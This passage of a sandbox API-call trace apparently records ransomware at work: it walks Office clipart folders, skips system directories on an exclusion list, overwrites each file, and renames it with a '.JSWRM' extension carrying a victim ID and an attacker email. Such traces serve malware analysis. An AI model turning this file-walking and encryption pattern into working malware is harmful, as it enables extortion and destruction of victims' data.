hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.575] CloseHandle (hObject=0x314) returned 1 [0091.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0091.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0091.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0091.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0091.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0091.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0091.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.575] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01064_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01064_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01064_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01064_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0091.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0091.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0091.576] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x54a8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01066_.WMF", cAlternateFileName="")) returned 1 [0091.576] lstrcmpiW (lpString1="NA01066_.WMF", lpString2=".") returned 1 [0091.576] lstrcmpiW (lpString1="NA01066_.WMF", lpString2="..") returned 1 [0091.576] lstrcmpiW (lpString1="NA01066_.WMF", lpString2="...") returned 1 [0091.576] lstrcmpiW (lpString1="NA01066_.WMF", lpString2="windows") returned -1 [0091.576] lstrcmpiW (lpString1="NA01066_.WMF", lpString2="recovery") returned -1 [0091.576] lstrcmpiW (lpString1="NA01066_.WMF", lpString2="perflogs") returned -1 [0091.576] lstrcmpiW (lpString1="NA01066_.WMF", lpString2="documents and settings") returned 1 [0091.576] lstrcmpiW (lpString1="NA01066_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.576] lstrcmpiW (lpString1="NA01066_.WMF", lpString2="system volume information") returned -1 [0091.576] lstrcmpiW (lpString1="NA01066_.WMF", lpString2="msocache") returned 1 [0091.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0091.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01066_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01066_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01066_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0091.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0091.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01066_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01066_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01066_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0091.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0091.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0091.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0091.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01066_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01066_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.578] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21672) returned 1 [0091.578] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x54a0) returned 0x24d210 [0091.579] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x54a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x54a0, lpOverlapped=0x0) returned 1 [0091.582] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.582] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x54a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x54a0, lpOverlapped=0x0) returned 1 [0091.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0091.582] CloseHandle (hObject=0x314) returned 1 [0091.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0091.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0091.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0091.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0091.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0091.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0091.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.583] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01066_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01066_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01066_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01066_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0091.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0091.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0091.583] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a7e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01069_.WMF", cAlternateFileName="")) returned 1 [0091.584] lstrcmpiW (lpString1="NA01069_.WMF", lpString2=".") returned 1 [0091.584] lstrcmpiW (lpString1="NA01069_.WMF", lpString2="..") returned 1 [0091.584] lstrcmpiW (lpString1="NA01069_.WMF", lpString2="...") returned 1 [0091.584] lstrcmpiW (lpString1="NA01069_.WMF", lpString2="windows") returned -1 [0091.584] lstrcmpiW (lpString1="NA01069_.WMF", lpString2="recovery") returned -1 [0091.584] lstrcmpiW (lpString1="NA01069_.WMF", lpString2="perflogs") returned -1 [0091.584] lstrcmpiW (lpString1="NA01069_.WMF", lpString2="documents and settings") returned 1 [0091.584] lstrcmpiW (lpString1="NA01069_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.584] lstrcmpiW (lpString1="NA01069_.WMF", lpString2="system volume information") returned -1 [0091.584] lstrcmpiW (lpString1="NA01069_.WMF", lpString2="msocache") returned 1 [0091.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0091.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01069_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01069_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01069_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0091.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0091.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01069_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01069_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01069_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0091.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0091.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0091.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0091.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01069_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01069_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.585] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6782) returned 1 [0091.585] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a70) returned 0x205850 [0091.585] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1a70, lpOverlapped=0x0) returned 1 [0091.588] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.588] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1a70, lpOverlapped=0x0) returned 1 [0091.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.588] CloseHandle (hObject=0x314) returned 1 [0091.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0091.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0091.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0091.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0091.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0091.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0091.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.589] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01069_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01069_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01069_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01069_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0091.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0091.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0091.590] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5aa7bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5aa7bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5aa7bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA01123_.WMF", cAlternateFileName="")) returned 1 [0091.590] lstrcmpiW (lpString1="NA01123_.WMF", lpString2=".") returned 1 [0091.590] lstrcmpiW (lpString1="NA01123_.WMF", lpString2="..") returned 1 [0091.590] lstrcmpiW (lpString1="NA01123_.WMF", lpString2="...") returned 1 [0091.590] lstrcmpiW (lpString1="NA01123_.WMF", lpString2="windows") returned -1 [0091.590] lstrcmpiW (lpString1="NA01123_.WMF", lpString2="recovery") returned -1 [0091.590] lstrcmpiW (lpString1="NA01123_.WMF", lpString2="perflogs") returned -1 [0091.590] lstrcmpiW (lpString1="NA01123_.WMF", lpString2="documents and settings") returned 1 [0091.590] lstrcmpiW (lpString1="NA01123_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.590] lstrcmpiW (lpString1="NA01123_.WMF", lpString2="system volume information") returned -1 [0091.590] lstrcmpiW (lpString1="NA01123_.WMF", lpString2="msocache") returned 1 [0091.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0091.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01123_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01123_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01123_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0091.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0091.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01123_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA01123_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA01123_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0091.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0091.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0091.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0091.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01123_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01123_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.591] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7680) returned 1 [0091.591] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.591] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e00) returned 0x205850 [0091.591] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1e00, lpOverlapped=0x0) returned 1 [0091.594] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.594] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1e00, lpOverlapped=0x0) returned 1 [0091.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.595] CloseHandle (hObject=0x314) returned 1 [0091.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0091.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0091.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0091.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0091.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0091.595] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0091.595] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0091.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0091.596] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01123_.WMF" (normalized: "c:\\program files\\microsoft 